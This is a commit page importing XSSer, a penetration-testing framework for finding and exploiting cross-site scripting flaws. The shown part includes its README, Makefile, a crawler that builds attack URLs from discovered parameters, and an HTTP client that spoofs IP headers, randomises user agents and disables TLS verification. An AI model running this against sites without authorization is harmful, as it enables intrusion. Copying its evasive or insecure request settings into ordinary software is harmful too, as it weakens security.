Browse Source

moved from https://github.com/epsylon/xsser

psy 1 year ago
parent
commit
96caedcaf1
54 changed files with 15879 additions and 3 deletions
  1. 53 3
      README.md
  2. 34 0
      xsser/Makefile
  3. 20 0
      xsser/core/__init__.py
  4. 329 0
      xsser/core/crawler.py
  5. 519 0
      xsser/core/curlcontrol.py
  6. 103 0
      xsser/core/dork.py
  7. 116 0
      xsser/core/encdec.py
  8. 52 0
      xsser/core/flashxss.py
  9. 55 0
      xsser/core/fuzzing/DCP.py
  10. 44 0
      xsser/core/fuzzing/DOM.py
  11. 66 0
      xsser/core/fuzzing/HTTPsr.py
  12. 20 0
      xsser/core/fuzzing/__init__.py
  13. 30 0
      xsser/core/fuzzing/dorks.txt
  14. 104 0
      xsser/core/fuzzing/heuristic.py
  15. 95 0
      xsser/core/fuzzing/user-agents.txt
  16. 1145 0
      xsser/core/fuzzing/vectors.py
  17. 616 0
      xsser/core/globalmap.py
  18. 1974 0
      xsser/core/gtkcontroller.py
  19. 68 0
      xsser/core/imagexss.py
  20. 2694 0
      xsser/core/main.py
  21. 164 0
      xsser/core/mozchecker.py
  22. 207 0
      xsser/core/options.py
  23. 20 0
      xsser/core/post/__init__.py
  24. 173 0
      xsser/core/post/xml_exporter.py
  25. 43 0
      xsser/core/randomip.py
  26. 54 0
      xsser/core/reporter.py
  27. 450 0
      xsser/core/threadpool.py
  28. 102 0
      xsser/core/tokenhub.py
  29. 170 0
      xsser/core/twsupport.py
  30. 44 0
      xsser/core/update.py
  31. 17 0
      xsser/doc/AUTHOR
  32. 161 0
      xsser/doc/CHANGELOG
  33. 209 0
      xsser/doc/COPYING
  34. 48 0
      xsser/doc/INSTALL
  35. 11 0
      xsser/doc/MANIFESTO
  36. 171 0
      xsser/doc/README
  37. 5 0
      xsser/doc/requirements.txt
  38. 128 0
      xsser/gtk/docs/about.txt
  39. 16 0
      xsser/gtk/docs/wizard0.txt
  40. 16 0
      xsser/gtk/docs/wizard1.txt
  41. 20 0
      xsser/gtk/docs/wizard2.txt
  42. 20 0
      xsser/gtk/docs/wizard3.txt
  43. 23 0
      xsser/gtk/docs/wizard4.txt
  44. 17 0
      xsser/gtk/docs/wizard5.txt
  45. 16 0
      xsser/gtk/docs/wizard6.txt
  46. BIN
      xsser/gtk/images/world.png
  47. BIN
      xsser/gtk/images/xsser.jpg
  48. BIN
      xsser/gtk/images/xssericon_16x16.png
  49. BIN
      xsser/gtk/images/xssericon_24x24.png
  50. BIN
      xsser/gtk/images/xssericon_32x32.png
  51. 9 0
      xsser/gtk/xsser.desktop
  52. 5333 0
      xsser/gtk/xsser.ui
  53. 57 0
      xsser/setup.py
  54. 38 0
      xsser/xsser

+ 53 - 3
README.md

@@ -1,3 +1,53 @@
-# xsser
-
-Cross Site "Scripter" (aka XSSer) is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based applications.
+  ![XSSer](https://xsser.03c8.net/xsser/zika1.png "XSSerBanner")
+
+=================================================================== 
+
+ Cross Site "Scripter" (aka XSSer) is an automatic -framework- to detect, exploit and report XSS vulnerabilities.
+
+----------
+
+ XSSer is released under the GPLv3. You can find the full license text
+in the [COPYING](./xsser/doc/COPYING) file.
+
+----------
+
+ + Web:  https://xsser.03c8.net
+
+----------
+
+  ![XSSer](https://xsser.03c8.net/xsser/zika2.png "XSSerManifesto")
+
+#### Installing:
+
+ XSSer runs on many platforms. It requires Python and the following libraries:
+
+    - python-pycurl - Python bindings to libcurl
+    - python-xmlbuilder - create xml/(x)html files - Python 2.x
+    - python-beautifulsoup - error-tolerant HTML parser for Python
+    - python-geoip - Python bindings for the GeoIP IP-to-country resolver library
+
+ On Debian-based systems (ex: Ubuntu), run: 
+
+    sudo apt-get install python-pycurl python-xmlbuilder python-beautifulsoup python-geoip
+
+ On other systems such as: Kali, Ubuntu, ArchLinux, ParrotSec, Fedora, etc... also run:
+
+       pip install geoip 
+
+####  Source libs:
+
+       * Python: https://www.python.org/downloads/
+       * PyCurl: http://pycurl.sourceforge.net/
+       * PyBeautifulSoup: https://pypi.python.org/pypi/BeautifulSoup
+       * PyGeoIP: https://pypi.python.org/pypi/GeoIP
+
+----------
+
+####  Screenshots:
+
+  ![XSSer](https://xsser.03c8.net/xsser/url_generation.png "XSSerSchema")
+
+  ![XSSer](https://xsser.03c8.net/xsser/zika3.png "XSSerAdvanced")
+
+  ![XSSer](https://xsser.03c8.net/xsser/zika4.png "XSSerGeoMap")
+

+ 34 - 0
xsser/Makefile

@@ -0,0 +1,34 @@
+# $Id: Makefile,v 1.6 2008/10/29 01:01:35 ghantoos Exp $
+#
+PYTHON=`which python`
+DESTDIR=/
+BUILDIR=$(CURDIR)/debian/xsser
+PROJECT=xsser
+VERSION=0.7.0
+
+all:
+	@echo "make source - Create source package"
+	@echo "make install - Install on local system"
+	@echo "make buildrpm - Generate a rpm package"
+	@echo "make builddeb - Generate a deb package"
+	@echo "make clean - Get rid of scratch and byte files"
+
+source:
+	$(PYTHON) setup.py sdist $(COMPILE)
+
+install:
+	$(PYTHON) setup.py install --root $(DESTDIR) $(COMPILE)
+
+buildrpm:
+	$(PYTHON) setup.py bdist_rpm --post-install=rpm/postinstall --pre-uninstall=rpm/preuninstall
+
+builddeb:
+	$(PYTHON) setup.py sdist $(COMPILE) --dist-dir=../
+	rename -f 's/$(PROJECT)-(.*)\.tar\.gz/$(PROJECT)_$$1\.orig\.tar\.gz/' ../*
+	dpkg-buildpackage -i -I -rfakeroot
+
+clean:
+	$(PYTHON) setup.py clean
+	$(MAKE) -f $(CURDIR)/debian/rules clean
+	rm -rf build/ MANIFEST
+	find . -name '*.pyc' -delete

+ 20 - 0
xsser/core/__init__.py

@@ -0,0 +1,20 @@
+"""
+$Id$
+
+This file is part of the xsser project, http://xsser.03c8.net
+
+Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+
+xsser is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 3 of the License.
+
+xsser is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with xsser; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""

+ 329 - 0
xsser/core/crawler.py

@@ -0,0 +1,329 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-"
+# vim: set expandtab tabstop=4 shiftwidth=4:
+"""
+$Id$
+
+This file is part of the xsser project, http://xsser.03c8.net
+
+Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+
+xsser is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 3 of the License.
+
+xsser is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with xsser; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+import sys
+import urllib
+import urllib2
+import urlparse
+import pycurl
+import time
+import traceback
+import curlcontrol
+import threadpool
+from Queue import Queue
+from collections import defaultdict
+from BeautifulSoup import BeautifulSoup
+
+class EmergencyLanding(Exception):
+    pass
+
+class Crawler(object):
+    """
+    Crawler class.
+
+    Crawls a webpage looking for url arguments.
+    Dont call from several threads! You should create a new one
+    for every thread.
+    """
+    def __init__(self, parent, curlwrapper=None, crawled=None, pool=None):
+        # verbose: 0-no printing, 1-prints dots, 2-prints full output
+        self.verbose = 1
+        self._parent = parent
+        self._to_crawl = []
+        self._parse_external = True
+        self._requests = []
+        self._ownpool = False
+        self._reporter = None
+        self._armed = True
+        self._poolsize = 10
+        self._found_args = defaultdict(list)
+        self.pool = pool
+        if crawled:
+            self._crawled = crawled
+        else:
+            self._crawled = []
+        if curlwrapper:
+            self.curl = curlwrapper
+        else:
+            self.curl = curlcontrol.Curl
+
+    def report(self, msg):
+        if self._reporter:
+            self._reporter.report(msg)
+        else:
+            print msg
+
+    def set_reporter(self, reporter):
+        self._reporter = reporter
+
+    def _find_args(self, url):
+        """
+        find parameters in given url.
+        """
+        parsed = urllib2.urlparse.urlparse(url)
+        qs = urlparse.parse_qs(parsed.query)
+        if parsed.scheme:
+            path = parsed.scheme + "://" + parsed.netloc + parsed.path
+        else:
+            path = parsed.netloc + parsed.path
+        for arg_name in qs:
+            key = (arg_name, parsed.netloc)
+            zipped = zip(*self._found_args[key])
+            if not zipped or not path in zipped[0]:
+                self._found_args[key].append([path, url])
+                self.generate_result(arg_name, path, url)
+        ncurrent = sum(map(lambda s: len(s), self._found_args.values()))
+        if ncurrent >= self._max:
+            self._armed = False
+
+    def cancel(self):
+        self._armed = False
+
+    def crawl(self, path, depth=3, width=0, local_only=True):
+        """
+        setup and perform a crawl on the given url.
+        """
+        if not self._armed:
+            return []
+        parsed = urllib2.urlparse.urlparse(path)
+        basepath = parsed.scheme + "://" + parsed.netloc
+        self._parse_external = not local_only
+        if not self.pool:
+            self.pool = threadpool.ThreadPool(self._poolsize)
+        if self.verbose == 2:
+            self.report("crawling: " + path)
+        if width == 0:
+            self._max = 1000000000
+        else:
+            self._max = int(width)
+        self._path = path
+        self._depth = depth
+        attack_urls = []
+        if not self._parent._landing and self._armed:
+            self._crawl(basepath, path, depth, width)
+            if self._ownpool:
+                self.pool.dismissWorkers(len(self.pool.workers))
+                self.pool.joinAllDismissedWorkers()
+        return attack_urls
+
+    def shutdown(self):
+        if self._ownpool:
+            self.pool.dismissWorkers(len(self.pool.workers))
+            self.pool.joinAllDismissedWorkers()
+
+    def generate_result(self, arg_name, path, url):
+        parsed = urllib2.urlparse.urlparse(url)
+        qs = urlparse.parse_qs(parsed.query)
+        qs_joint = {}
+        for key, val in qs.iteritems():
+            qs_joint[key] = val[0]
+        attack_qs = dict(qs_joint)
+        attack_qs[arg_name] = "VECTOR"
+        attack_url = path + '?' + urllib.urlencode(attack_qs)
+        if not attack_url in self._parent.crawled_urls:
+            self._parent.crawled_urls.append(attack_url)
+
+    def _crawl(self, basepath, path, depth=3, width=0):
+        """
+        perform a crawl on the given url.
+
+        this function downloads and looks for links.
+        """
+        self._crawled.append(path)
+        if not path.startswith("http"):
+            return
+
+        def _cb(request, result):
+            self._get_done(depth, width, request, result)
+
+        self._requests.append(path)
+        self.pool.addRequest(self._curl_main, [[path, depth, width, basepath]],
+                             self._get_done_dummy, self._get_error)
+
+    def _curl_main(self, pars):
+        path, depth, width, basepath = pars
+        if not self._armed or len(self._parent.crawled_urls) >= self._max:
+            raise EmergencyLanding
+        c = self.curl()
+        c.set_timeout(5)
+        try:
+            res = c.get(path)
+        except Exception as error:
+            c.close()
+            del c
+            raise error
+        c_info = c.info().get('content-type', None)
+        c.close()
+        del c
+        self._get_done(basepath, depth, width, path, res, c_info)
+
+    def _get_error(self, request, error):
+        try:
+            path, depth, width, basepath = request.args[0]
+            e_type, e_value, e_tb = error
+            if e_type == pycurl.error:
+                errno, message = e_value.args
+                if errno == 28:
+                    print("requests pyerror -1")
+                    self.enqueue_jobs()
+                    self._requests.remove(path)
+                    return # timeout
+                else:
+                    self.report('crawler curl error: '+message+' ('+str(errno)+')')
+            elif e_type == EmergencyLanding:
+                pass
+            else:
+                traceback.print_tb(e_tb)
+                self.report('crawler error: '+str(e_value)+' '+path)
+            if not e_type == EmergencyLanding:
+                for reporter in self._parent._reporters:
+                    reporter.mosquito_crashed(path, str(e_value))
+            self.enqueue_jobs()
+            self._requests.remove(path)
+        except:
+            return
+
+    def _emergency_parse(self, html_data, start=0):
+        links = set()
+        pos = 0
+        if not html_data:
+            return
+        data_len = len(html_data)
+        while pos < data_len:
+            if len(links)+start > self._max:
+                break
+            pos = html_data.find("href=", pos)
+            if not pos == -1:
+                sep = html_data[pos+5]
+                if sep == "h":
+                    pos -= 1
+                    sep=">"
+                href = html_data[pos+6:html_data.find(sep, pos+7)].split("#")[0]
+                pos = pos+1
+                links.add(href)
+            else:
+                break
+        return map(lambda s: {'href': s}, links)
+
+    def _get_done_dummy(self, request, result):
+        path = request.args[0][0]
+        self.enqueue_jobs()
+        self._requests.remove(path)
+
+    def enqueue_jobs(self):
+        if len(self.pool.workRequests) < int(self._max/2):
+            while self._to_crawl:
+                next_job = self._to_crawl.pop()
+                self._crawl(*next_job)
+
+    def _get_done(self, basepath, depth, width, path, html_data, content_type): # request, result):
+        if not self._armed or len(self._parent.crawled_urls) >= self._max:
+            raise EmergencyLanding
+        try:
+            encoding = content_type.split(";")[1].split("=")[1].strip()
+        except:
+            encoding = None
+        try:
+            soup = BeautifulSoup(html_data, from_encoding=encoding)
+            links = None
+        except:
+            soup = None
+            links = self._emergency_parse(html_data)
+
+        for reporter in self._parent._reporters:
+            reporter.start_crawl(path)
+
+        if not links and soup:
+            links = soup.find_all('a')
+            forms = soup.find_all('form')
+
+            for form in forms:
+                pars = {}
+                if form.has_key("action"):
+                    action_path = urlparse.urljoin(path, form["action"])
+                else:
+                    action_path = path
+                for input_par in form.find_all('input'):
+
+                    if not input_par.has_key("name"):
+                        continue
+                    value = "foo"
+                    if input_par.has_key("value") and input_par["value"]:
+                        value = input_par["value"]
+                    pars[input_par["name"]] = value
+                for input_par in form.findAll('select'):
+                    pars[input_par["name"]] = "1"
+                if pars:
+                    links.append({"url":action_path + '?' + urllib.urlencode(pars)})
+                else:
+                    self.report("form with no pars")
+                    links.append({"url":action_path})
+            links += self._emergency_parse(html_data, len(links))
+        if self.verbose == 2:
+            self.report(" "*(self._depth-depth) + path +" "+ str(len(links)))
+        elif self.verbose:
+            sys.stdout.write(".")
+            sys.stdout.flush()
+        if not links:
+            return
+        if len(links) > self._max:
+            links = links[:self._max]
+        for a in links:
+            try:
+                href = str(a['href'].encode('utf-8'))
+            except KeyError:
+                # this link has no href
+                continue
+            except:
+                # can't decode or something darker..
+                continue
+            if href.startswith("javascript") or href.startswith('mailto:'):
+                continue
+            href = urlparse.urljoin(path, href)
+            if not href.startswith("http") or not "." in href:
+                continue
+            href = href.split('#',1)[0]
+            scheme_rpos = href.rfind('http://')
+            if not scheme_rpos in [0, -1]:
+                # looks like some kind of redirect so we try both too ;)
+                href1 = href[scheme_rpos:]
+                href2 = href[:scheme_rpos]
+                self._check_url(basepath, path, href1, depth, width)
+                self._check_url(basepath, path, href2, depth, width)
+            self._check_url(basepath, path, href, depth, width)
+        return self._found_args
+
+    def _check_url(self, basepath, path, href, depth, width):
+        """
+        process the given url for a crawl
+        check to see if we have to continue crawling on the given url.
+        """
+        do_crawling = self._parse_external or href.startswith(basepath)
+        if do_crawling and not href in self._crawled:
+            self._find_args(href)
+            for reporter in self._parent._reporters:
+                reporter.add_link(path, href)
+            self.report("\n[Info] Spidering: " + str(href))
+            if self._armed and depth>0:
+                if len(self._to_crawl) < self._max:
+                    self._to_crawl.append([basepath, href, depth-1, width])

+ 519 - 0
xsser/core/curlcontrol.py

@@ -0,0 +1,519 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-"
+# vim: set expandtab tabstop=4 shiftwidth=4:
+"""
+$Id$
+
+This file is part of the xsser project, http://xsser.03c8.net
+
+Copyright (c) 2011/2018 psy <epsylon@riseup.net>
+
+xsser is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 3 of the License.
+
+xsser is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with xsser; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+import os, urllib, mimetools, pycurl, re, time, random
+
+try:
+    from cStringIO import StringIO
+except ImportError:
+    from StringIO import StringIO
+
+class Curl:
+    """
+    Class to control curl on behalf of the application.
+    """
+    cookie = None
+    dropcookie = None
+    referer = None
+    headers = None
+    proxy = None
+    ignoreproxy = None
+    tcp_nodelay = None
+    xforw = None
+    xclient = None
+    atype = None
+    acred = None
+    #acert = None
+    retries = 1
+    delay = 0
+    followred = 0
+    fli = None
+    agents = [] # user-agents
+    try:
+        f = open("core/fuzzing/user-agents.txt").readlines() # set path for user-agents
+    except:
+        f = open("fuzzing/user-agents.txt").readlines() # set path for user-agents when testing
+    for line in f:
+        agents.append(line)
+    agent = random.choice(agents).strip() # set random user-agent
+
+    def __init__(self, base_url="", fakeheaders=[ 'Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg', 'Connection: Keep-Alive', 'Content-type: application/x-www-form-urlencoded; charset=UTF-8']):
+        self.handle = pycurl.Curl()
+        self._closed = False
+        self.set_url(base_url)
+        self.verbosity = 0
+        self.signals = 1
+        self.payload = ""
+        self.header = StringIO()
+        self.fakeheaders = fakeheaders
+        self.headers = None
+        self.set_option(pycurl.SSL_VERIFYHOST, 0)
+        self.set_option(pycurl.SSL_VERIFYPEER, 0)
+        try:
+            self.set_option(pycurl.SSLVERSION, pycurl.SSLVERSION_TLSv1_2) # max supported version by pycurl
+        except:
+            try:
+                self.set_option(pycurl.SSLVERSION, pycurl.SSLVERSION_TLSv1_1)
+            except: # use vulnerable TLS/SSL versions (TLS1_0 -> weak enc | SSLv2 + SSLv3 -> deprecated)
+                try:
+                    self.set_option(pycurl.SSLVERSION, pycurl.SSLVERSION_TLSv1_0)
+                except:
+                    try:
+                        self.set_option(pycurl.SSLVERSION, pycurl.SSLVERSION_SSLv3)
+                    except:
+                        self.set_option(pycurl.SSLVERSION, pycurl.SSLVERSION_SSLv2)
+        self.set_option(pycurl.FOLLOWLOCATION, 0)
+        self.set_option(pycurl.MAXREDIRS, 50)
+        # this is 'black magic'
+        self.set_option(pycurl.COOKIEFILE, '/dev/null')
+        self.set_option(pycurl.COOKIEJAR, '/dev/null')
+        self.set_timeout(30)
+        self.set_option(pycurl.NETRC, 1)
+        self.set_nosignals(1)
+
+        def payload_callback(x):
+            self.payload += x
+        self.set_option(pycurl.WRITEFUNCTION, payload_callback)
+        def header_callback(x):
+            self.header.write(x)
+        self.set_option(pycurl.HEADERFUNCTION, header_callback)
+
+    def set_url(self, url):
+        """
+        Set the base url.
+        """
+        self.base_url = url
+        self.set_option(pycurl.URL, self.base_url)
+        return url
+
+    def set_cookie(self, cookie):
+        """
+        Set the app cookie.
+        """
+        self.cookie = cookie
+        self.dropcookie = dropcookie
+        if dropcookie:
+            self.set_option(pycurl.COOKIELIST, 'ALL')
+            self.set_option(pycurl.COOKIE, None)
+        else:
+            self.set_option(pycurl.COOKIELIST, '')
+            self.set_option(pycurl.COOKIE, self.cookie)
+        return cookie
+
+    def set_agent(self, agent):
+        """
+        Set the user agent.
+        """
+        self.agent = agent
+        self.set_option(pycurl.USERAGENT, self.agent)
+        return agent
+
+    def set_referer(self, referer):
+        """
+        Set the referer.
+        """
+        self.referer = referer
+        self.set_option(pycurl.REFERER, self.referer)
+        return referer
+
+    def set_headers(self, headers):
+        """
+        Set extra headers.
+        """
+        self.headers = headers
+        self.headers = self.headers.split("\n")
+        for headerValue in self.headers:
+            header, value = headerValue.split(": ")
+
+            if header and value:
+                self.set_option(pycurl.HTTPHEADER, (header, value))
+        return headers
+
+    def set_proxy(self, ignoreproxy, proxy):
+        """
+        Set the proxy to use.
+        """
+        self.proxy = proxy
+        self.ignoreproxy = ignoreproxy
+        if ignoreproxy:
+            self.set_option(pycurl.PROXY, "")
+        else:
+            self.set_option(pycurl.PROXY, self.proxy)
+        return proxy
+
+    def set_option(self, *args):
+        """
+        Set the given option.
+        """
+        apply(self.handle.setopt, args)
+
+    def set_verbosity(self, level):
+        """
+        Set the verbosity level.
+        """
+        self.set_option(pycurl.VERBOSE, level)
+
+    def set_nosignals(self, signals="1"):
+        """
+        Disable signals.
+
+        curl will be using other means besides signals to timeout
+        """
+        self.signals = signals
+        self.set_option(pycurl.NOSIGNAL, self.signals)
+        return signals
+
+    def set_tcp_nodelay(self, tcp_nodelay):
+        """
+        Set the TCP_NODELAY option.
+        """
+        self.tcp_nodelay = tcp_nodelay
+        self.set_option(pycurl.TCP_NODELAY, tcp_nodelay)
+        return tcp_nodelay
+
+    def set_timeout(self, timeout):
+        """
+        Set timeout for requests.
+        """
+        self.set_option(pycurl.CONNECTTIMEOUT,timeout)
+        self.set_option(pycurl.TIMEOUT, timeout)
+        return timeout
+
+    def set_follow_redirections(self, followred, fli):
+        """
+        Set follow locations parameters to follow redirection pages (302)
+        """
+        self.followred = followred
+        self.fli = fli
+        if followred:
+            self.set_option(pycurl.FOLLOWLOCATION , 1)
+            self.set_option(pycurl.MAXREDIRS, 50)
+            if fli:
+                self.set_option(pycurl.MAXREDIRS, fli)
+        else:
+            self.set_option(pycurl.FOLLOWLOCATION , 0)
+        return followred
+
+    def do_head_check(self, urls):
+        """
+        Send a HEAD request before to start to inject to verify stability of the target
+        """
+        for u in urls:
+            self.set_option(pycurl.URL, u) 
+            self.set_option(pycurl.NOBODY,1)
+            self.set_option(pycurl.FOLLOWLOCATION, 0)
+            self.set_option(pycurl.MAXREDIRS, 50)
+            self.set_option(pycurl.SSL_VERIFYHOST, 0)
+            self.set_option(pycurl.SSL_VERIFYPEER, 0)
+            if self.fakeheaders:
+                from core.randomip import RandomIP
+                if self.xforw:
+                    generate_random_xforw = RandomIP()
+                    xforwip = generate_random_xforw._generateip('')
+                    xforwfakevalue = ['X-Forwarded-For: ' + str(xforwip)]
+                if self.xclient:
+                    generate_random_xclient = RandomIP()
+                    xclientip = generate_random_xclient._generateip('')
+                    xclientfakevalue = ['X-Client-IP: ' + str(xclientip)]
+                if self.xforw:
+                    self.set_option(pycurl.HTTPHEADER, self.fakeheaders + xforwfakevalue)
+                    if self.xclient:
+                        self.set_option(pycurl.HTTPHEADER, self.fakeheaders + xforwfakevalue + xclientfakevalue)
+                elif self.xclient:
+                    self.set_option(pycurl.HTTPHEADER, self.fakeheaders + xclientfakevalue)
+            if self.headers:
+                self.fakeheaders = self.fakeheaders + self.headers
+            self.set_option(pycurl.HTTPHEADER, self.fakeheaders)
+            if self.agent:
+                self.set_option(pycurl.USERAGENT, self.agent)
+            if self.referer:
+                self.set_option(pycurl.REFERER, self.referer)
+            if self.proxy:
+                self.set_option(pycurl.PROXY, self.proxy)
+            if self.ignoreproxy:
+                self.set_option(pycurl.PROXY, "")
+            if self.timeout:
+                self.set_option(pycurl.CONNECTTIMEOUT, self.timeout)
+                self.set_option(pycurl.TIMEOUT, self.timeout)
+            if self.signals:
+                self.set_option(pycurl.NOSIGNAL, self.signals)
+            if self.tcp_nodelay:
+                self.set_option(pycurl.TCP_NODELAY, self.tcp_nodelay)
+            if self.cookie:
+                self.set_option(pycurl.COOKIE, self.cookie)
+            try:
+                self.handle.perform()
+            except:
+                return
+            if str(self.handle.getinfo(pycurl.HTTP_CODE)) in ["302", "301"]:
+                self.set_option(pycurl.FOLLOWLOCATION, 1)
+
+    def __request(self, relative_url=None):
+        """
+        Perform a request and returns the payload.
+        """
+        if self.fakeheaders:
+            from core.randomip import RandomIP
+            if self.xforw:
+                """
+                Set the X-Forwarded-For to use.
+                """
+                generate_random_xforw = RandomIP()
+                xforwip = generate_random_xforw._generateip('')
+                #xforwip = '127.0.0.1'
+                xforwfakevalue = ['X-Forwarded-For: ' + str(xforwip)]
+            if self.xclient:
+                """ 
+                Set the X-Client-IP to use.
+                """
+                generate_random_xclient = RandomIP()
+                xclientip = generate_random_xclient._generateip('')
+                #xclientip = '127.0.0.1'
+                xclientfakevalue = ['X-Client-IP: ' + str(xclientip)]
+            if self.xforw:
+                self.set_option(pycurl.HTTPHEADER, self.fakeheaders + xforwfakevalue)
+                if self.xclient:
+                    self.set_option(pycurl.HTTPHEADER, self.fakeheaders + xforwfakevalue + xclientfakevalue)
+            elif self.xclient:
+                self.set_option(pycurl.HTTPHEADER, self.fakeheaders + xclientfakevalue)
+        if self.headers:
+            # XXX sanitize user input
+            self.fakeheaders = self.fakeheaders + self.headers
+        self.set_option(pycurl.HTTPHEADER, self.fakeheaders)
+
+        if self.agent:
+            self.set_option(pycurl.USERAGENT, self.agent)
+        if self.referer:
+            self.set_option(pycurl.REFERER, self.referer)
+        if self.proxy:
+            self.set_option(pycurl.PROXY, self.proxy)
+        if self.ignoreproxy:
+            self.set_option(pycurl.PROXY, "")
+        if relative_url:
+            self.set_option(pycurl.URL,os.path.join(self.base_url,relative_url))
+        if self.timeout:
+            self.set_option(pycurl.CONNECTTIMEOUT, self.timeout)
+            self.set_option(pycurl.TIMEOUT, self.timeout)
+        if self.signals:
+            self.set_option(pycurl.NOSIGNAL, self.signals)
+        if self.tcp_nodelay:
+            self.set_option(pycurl.TCP_NODELAY, self.tcp_nodelay)
+        if self.cookie:
+            self.set_option(pycurl.COOKIE, self.cookie)
+        if self.followred:
+            self.set_option(pycurl.FOLLOWLOCATION , 1)
+            self.set_option(pycurl.MAXREDIRS, 50)
+            if self.fli:
+                self.set_option(pycurl.MAXREDIRS, int(self.fli))
+        else:
+            self.set_option(pycurl.FOLLOWLOCATION , 0)
+            if self.fli:
+                print "\n[E] You must launch --follow-redirects command to set correctly this redirections limit\n"
+                return
+        """ 
+        Set the HTTP authentication method: Basic, Digest, GSS, NTLM or Certificate
+        """
+        if self.atype and self.acred:
+            atypelower = self.atype.lower()
+            if atypelower not in ( "basic", "digest", "ntlm", "gss" ):
+                print "\n[E] HTTP authentication type value must be: Basic, Digest, GSS or NTLM\n"
+                return
+            acredregexp = re.search("^(.*?)\:(.*?)$", self.acred)
+            if not acredregexp:
+                print "\n[E] HTTP authentication credentials value must be in format username:password\n"
+                return
+            user = acredregexp.group(1)
+            password = acredregexp.group(2)
+            self.set_option(pycurl.USERPWD, "%s:%s" % (user,password))
+
+            if atypelower == "basic":
+                self.set_option(pycurl.HTTPAUTH, pycurl.HTTPAUTH_BASIC)
+            elif atypelower == "digest":
+                self.set_option(pycurl.HTTPAUTH, pycurl.HTTPAUTH_DIGEST)
+            elif atypelower == "ntlm":
+                self.set_option(pycurl.HTTPAUTH, pycurl.HTTPAUTH_NTLM)
+            elif atypelower == "gss":
+                self.set_option(pycurl.HTTPAUTH, pycurl.HTTPAUTH_GSSNEGOTIATE)
+            else:
+                self.set_option(pycurl.HTTPAUTH, None)
+
+            self.set_option(pycurl.HTTPHEADER, ["Accept:"])
+
+        elif self.atype and not self.acred:
+            print "\n[E] You specified the HTTP authentication type, but did not provide the credentials\n"
+            return
+        elif not self.atype and self.acred:
+            print "\n[E] You specified the HTTP authentication credentials, but did not provide the type\n"
+            return
+        #if self.acert:
+        #    acertregexp = re.search("^(.+?),\s*(.+?)$", self.acert)
+        #    if not acertregexp:
+        #        print "\n[E] HTTP authentication certificate option must be 'key_file,cert_file'\n"
+        #        return
+        #    # os.path.expanduser for support of paths with ~
+        #    key_file = os.path.expanduser(acertregexp.group(1))
+        #    cert_file = os.path.expanduser(acertregexp.group(2))
+        #    self.set_option(pycurl.SSL_VERIFYHOST, 0)
+        #    self.set_option(pycurl.SSL_VERIFYPEER, 1)
+        #    self.set_option(pycurl.SSH_PUBLIC_KEYFILE, key_file)
+        #    self.set_option(pycurl.CAINFO, cert_file)
+        #    self.set_option(pycurl.SSLCERT, cert_file)
+        #    self.set_option(pycurl.SSLCERTTYPE, 'p12')
+        #    self.set_option(pycurl.SSLCERTPASSWD, '1234')
+        #    self.set_option(pycurl.SSLKEY, key_file)
+        #    self.set_option(pycurl.SSLKEYPASSWD, '1234')
+        #    for file in (key_file, cert_file):
+        #        if not os.path.exists(file):
+        #            print "\n[E] File '%s' doesn't exist\n" % file
+        #            return
+        
+        self.set_option(pycurl.SSL_VERIFYHOST, 0)
+        self.set_option(pycurl.SSL_VERIFYPEER, 0)
+
+        self.header.seek(0,0)
+        self.payload = ""
+
+        for count in range(0, self.retries):
+            time.sleep(self.delay)
+            if self.dropcookie:
+                self.set_option(pycurl.COOKIELIST, 'ALL')
+                nocookie = ['Set-Cookie: ', '']
+                self.set_option(pycurl.HTTPHEADER, self.fakeheaders + nocookie)
+            try:
+                self.handle.perform()
+            except:
+                return
+        return self.payload
+
+    def get(self, url="", params=None):
+        """
+        Get a url.
+        """
+        if params:
+            url += "?" + urllib.urlencode(params)
+        self.set_option(pycurl.HTTPGET, 1)
+        return self.__request(url)
+
+    def post(self, cgi, params):
+        """
+        Post a url.
+        """
+        self.set_option(pycurl.POST, 1)
+        self.set_option(pycurl.POSTFIELDS, params)
+        return self.__request(cgi)
+
+    def body(self):
+        """
+        Get the payload from the latest operation.
+        """
+        return self.payload
+
+    def info(self):
+        """
+        Get an info dictionary from the selected url.
+        """
+        self.header.seek(0,0)
+        url = self.handle.getinfo(pycurl.EFFECTIVE_URL)
+        if url[:5] == 'http:':
+            self.header.readline()
+            m = mimetools.Message(self.header)
+        else:
+            m = mimetools.Message(StringIO())
+        #m['effective-url'] = url
+        m['http-code'] = str(self.handle.getinfo(pycurl.HTTP_CODE))
+        m['total-time'] = str(self.handle.getinfo(pycurl.TOTAL_TIME))
+        m['namelookup-time'] = str(self.handle.getinfo(pycurl.NAMELOOKUP_TIME))
+        m['connect-time'] = str(self.handle.getinfo(pycurl.CONNECT_TIME))
+        #m['pretransfer-time'] = str(self.handle.getinfo(pycurl.PRETRANSFER_TIME))
+        #m['redirect-time'] = str(self.handle.getinfo(pycurl.REDIRECT_TIME))
+        #m['redirect-count'] = str(self.handle.getinfo(pycurl.REDIRECT_COUNT))
+        #m['size-upload'] = str(self.handle.getinfo(pycurl.SIZE_UPLOAD))
